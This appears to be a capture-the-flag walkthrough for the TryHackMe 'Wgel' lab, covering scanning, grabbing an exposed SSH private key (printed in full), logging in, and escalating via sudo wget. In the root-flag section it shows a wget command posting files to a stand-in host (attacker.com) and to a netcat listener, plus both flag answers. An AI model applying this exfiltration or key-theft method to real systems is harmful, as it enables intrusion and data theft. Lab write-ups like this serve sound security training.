TryHackMe-Wgel-CTF

From aldeid
Jump to navigation Jump to search

#1 - User flag

Let’s start by scanning the IP with nmap:

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

2 ports are open: ssh and http, both on standard ports. Let’s start with http.

  • No robots.txt file (http://10.10.251.64/robots.txt)
  • When you connect, the default Apache welcome page is displayed, but there is something wrong in it. We’ll see that in a moment
  • dirsearch discovers a /sitemap directory:
$ /data/src/dirsearch/dirsearch.py -u http://10.10.251.64 -E -w /data/src/wordlists/common.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 4614

Error Log: /data/src/dirsearch/logs/errors-20-05-13_23-05-49.log

Target: http://10.10.251.64

[23:05:49] Starting: 
[23:05:50] 200 -   11KB - /
[23:05:50] 403 -  278B  - /.hta
[23:06:01] 200 -   11KB - /index.html
[23:06:09] 403 -  278B  - /server-status
[23:06:10] 301 -  316B  - /sitemap  ->  http://10.10.251.64/sitemap/

Task Completed
  • Connecting to http://10.10.251.64/sitemap/ shows a blog. It seems to be a wordpress installation using the unapp theme from colorlib, but it’s actually a fake wordpress installation (no wp-login or wp-admin path, all links are fake). Let’s confirm what directories we have under /sitemap/:
$ /data/src/dirsearch/dirsearch.py -u http://10.10.251.64/sitemap -E -w /data/src/wordlists/common.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 4614

Error Log: /data/src/dirsearch/logs/errors-20-05-13_23-04-09.log

Target: http://10.10.251.64/sitemap

[23:04:09] Starting: 
[23:04:10] 403 -  278B  - /sitemap/.hta
[23:04:10] 200 -   21KB - /sitemap/
[23:04:10] 301 -  321B  - /sitemap/.ssh  ->  http://10.10.251.64/sitemap/.ssh/
[23:04:16] 301 -  320B  - /sitemap/css  ->  http://10.10.251.64/sitemap/css/
[23:04:19] 301 -  322B  - /sitemap/fonts  ->  http://10.10.251.64/sitemap/fonts/
[23:04:21] 301 -  323B  - /sitemap/images  ->  http://10.10.251.64/sitemap/images/
[23:04:21] 200 -   21KB - /sitemap/index.html
[23:04:22] 301 -  319B  - /sitemap/js  ->  http://10.10.251.64/sitemap/js/

Task Completed

Interesting… we have a hidden .ssh/ directory, and it contains a private key. Let’s get it:

$ curl http://10.10.251.64/sitemap/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2mujeBv3MEQFCel8yvjgDz066+8Gz0W72HJ5tvG8bj7Lz380
m+JYAquy30lSp5jH/bhcvYLsK+T9zEdzHmjKDtZN2cYgwHw0dDadSXWFf9W2gc3x
W69vjkHLJs+lQi0bEJvqpCZ1rFFSpV0OjVYRxQ4KfAawBsCG6lA7GO7vLZPRiKsP
y4lg2StXQYuZ0cUvx8UkhpgxWy/OO9ceMNondU61kyHafKobJP7Py5QnH7cP/psr
+J5M/fVBoKPcPXa71mA/ZUioimChBPV/i/0za0FzVuJZdnSPtS7LzPjYFqxnm/BH
Wo/Lmln4FLzLb1T31pOoTtTKuUQWxHf7cN8v6QIDAQABAoIBAFZDKpV2HgL+6iqG
/1U+Q2dhXFLv3PWhadXLKEzbXfsAbAfwCjwCgZXUb9mFoNI2Ic4PsPjbqyCO2LmE
AnAhHKQNeUOn3ymGJEU9iJMJigb5xZGwX0FBoUJCs9QJMBBZthWyLlJUKic7GvPa
M7QYKP51VCi1j3GrOd1ygFSRkP6jZpOpM33dG1/ubom7OWDZPDS9AjAOkYuJBobG
SUM+uxh7JJn8uM9J4NvQPkC10RIXFYECwNW+iHsB0CWlcF7CAZAbWLsJgd6TcGTv
2KBA6YcfGXN0b49CFOBMLBY/dcWpHu+d0KcruHTeTnM7aLdrexpiMJ3XHVQ4QRP2
p3xz9QECgYEA+VXndZU98FT+armRv8iwuCOAmN8p7tD1W9S2evJEA5uTCsDzmsDj
7pUO8zziTXgeDENrcz1uo0e3bL13MiZeFe9HQNMpVOX+vEaCZd6ZNFbJ4R889D7I
dcXDvkNRbw42ZWx8TawzwXFVhn8Rs9fMwPlbdVh9f9h7papfGN2FoeECgYEA4EIy
GW9eJnl0tzL31TpW2lnJ+KYCRIlucQUnBtQLWdTncUkm+LBS5Z6dGxEcwCrYY1fh
shl66KulTmE3G9nFPKezCwd7jFWmUUK0hX6Sog7VRQZw72cmp7lYb1KRQ9A0Nb97
uhgbVrK/Rm+uACIJ+YD57/ZuwuhnJPirXwdaXwkCgYBMkrxN2TK3f3LPFgST8K+N
LaIN0OOQ622e8TnFkmee8AV9lPp7eWfG2tJHk1gw0IXx4Da8oo466QiFBb74kN3u
QJkSaIdWAnh0G/dqD63fbBP95lkS7cEkokLWSNhWkffUuDeIpy0R6JuKfbXTFKBW
V35mEHIidDqtCyC/gzDKIQKBgDE+d+/b46nBK976oy9AY0gJRW+DTKYuI4FP51T5
hRCRzsyyios7dMiVPtxtsomEHwYZiybnr3SeFGuUr1w/Qq9iB8/ZMckMGbxoUGmr
9Jj/dtd0ZaI8XWGhMokncVyZwI044ftoRcCQ+a2G4oeG8ffG2ZtW2tWT4OpebIsu
eyq5AoGBANCkOaWnitoMTdWZ5d+WNNCqcztoNppuoMaG7L3smUSBz6k8J4p4yDPb
QNF1fedEOvsguMlpNgvcWVXGINgoOOUSJTxCRQFy/onH6X1T5OAAW6/UXc4S7Vsg
jL8g9yBg4vPB8dHC6JeJpFFE06vxQMFzn6vjEab9GhnpMihrSCod
-----END RSA PRIVATE KEY-----

Let’s check if it is password protected:

$ /data/src/john/run/ssh2john.py id_rsa
id_rsa has no password!

No, it’s not. However, to use it, we need to know what user is associated to this key.

Back to the Apache default webpage, we notice that there is somethin wrong. See the comparison between these 2 screenshots (our default page on the left, a standard Apache default page on the right).

TryHackMe-Wgel-CTF-apache-default-page.png

Let’s have a closer look at the source code of the page:

$ curl -s http://10.10.251.64/

...[SNIP]...

          <pre>
/etc/apache2/
|-- apache2.conf
|       `--  ports.conf
|-- mods-enabled
|       |-- *.load
|       `-- *.conf
|-- conf-enabled
|       `-- *.conf
|-- sites-enabled
|       `-- *.conf


 <!-- Jessie don't forget to udate the webiste -->
          </pre>

...[SNIP]...

The offset is due to a comment that has been added to the page: Jessie don't forget to udate the webiste. The typo (webiste instead of website) is another indication that it has probably been manually added. Could Jessie be the user we are looking for?

Let’s check:

$ chmod 600 id_rsa
$ ssh -i id_rsa [email protected]

It works! We are now connected.

Our flag is in the Documents folder:

[email protected]:~$ ls -l
total 44
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Desktop
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Documents
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Downloads
-rw-r--r-- 1 jessie jessie 8980 oct 26  2019 examples.desktop
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Music
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Pictures
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Public
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Templates
drwxr-xr-x 2 jessie jessie 4096 oct 26  2019 Videos
[email protected]:~$ ls -l Desktop/
total 0
[email protected]:~$ ls -l Documents/
total 4
-rw-rw-r-- 1 jessie jessie 33 oct 26  2019 user_flag.txt
[email protected]:~$ cat Documents/user_flag.txt 
057c67131c3d5e42dd5cd3075b198ff6

#2 - Root flag

[email protected]:~$ ls -l /root/
ls: cannot open directory '/root/': Permission denied

We need to elevate our privileges. Let’s start by checking our privileges:

[email protected]:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can run wget as root without password. Let’s check here what we can do with it.

We can upload a file with sudo access:

export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-file=$LFILE $URL

As the first flag was named user_flag.txt, the root flag will likely be root_flag.txt. Let’s try… First open a listener on your local machine:

$ nc -nlvp 1234

And on the remote machine, enter the following command:

[email protected]:~$ sudo wget --post-file=/root/root_flag.txt 10.9.**.**:1234
--2020-05-14 09:11:19--  http://10.9.**.**:1234/
Connecting to 10.9.**.**:1234... connected.
HTTP request sent, awaiting response...

We now get the flag: b1b968b37519ad1daa6408188649263d